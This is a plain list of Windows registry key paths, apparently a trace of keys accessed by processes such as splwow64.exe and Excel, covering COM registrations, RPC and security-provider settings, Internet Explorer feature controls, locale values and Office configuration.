HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock\AllowDevelopmentWithoutDevLicense
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseActivationAuthenticationLevel
HKEY_CURRENT_USER\Software\Classes\AppID\splwow64.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\splwow64.exe\AppID
HKEY_CURRENT_USER\Software\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\10
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SynchronousPrintHandleAccessMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\PrinterDriverUnloadTimeOutMinutes
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\file\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FILEPROTOCOL_NOFINDFIRST_KB947853
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FILEPROTOCOL_NOFINDFIRST_KB947853
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\Elevation
HKEY_CURRENT_USER\Software\Classes\Interface\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\\xed\xa0\xbc\xed\xbc\x8e\xed\xa0\xbc\xed\xbc\x8f\xed\xa0\xbc\xed\xbc\x8d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\EnableJavaScriptDebugging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe\JScriptSetScriptStateStarted
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\Diagnosis
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\CommandLine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\IdentityType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ActivatableClasses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServerType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Identity
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServiceName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\CustomAttributes
HKEY_CURRENT_USER\Software\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{AF86E2E0-B12D-4c6a-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{AF86E2E0-B12D-4c6a-9C5A-D7AA65101E90}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\DontUseArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\MDDWDriver\DebugFlags

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\000603xx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PackageLockerPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\c:\program files (x86)\microsoft office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\AppV\Subsystem\VirtualRegistry\PassThroughPaths
HKEY_LOCAL_MACHINE\SYSTEM\Select\Current
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\DllPrevention
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\AvoidLargeAddresses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\STE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\MDMEnabled
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AppRecoveryPingInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFileFmtPrompt
HKEY_CURRENT_USER\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\CountryCode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo\SDXIdAndVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\DevInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\8D3810A9-D4E0-49C6-A71B-357728C38039\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData\VersionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData\ChunkCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ETag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\MsoWerCrashDllPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\MsoWerCrashDllPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\CVH\VirtualProductInfo\PackageGUID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ProductCodeListForC2RGimme\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}\ClickToRun
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\SKULanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures\en-us
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredUILanguageTagPendingInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\FollowSystemUILanguage
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\UILanguageInstallerFallbackOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LanguagePackTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\AuthoringLanguageCloud
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LocalCache\RegionalAndLanguageSettingsAccount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\InstallFonts
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface\SecurityDescriptor
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1EDD7E79811EB814A93FCB6559FABECE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\4$l
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
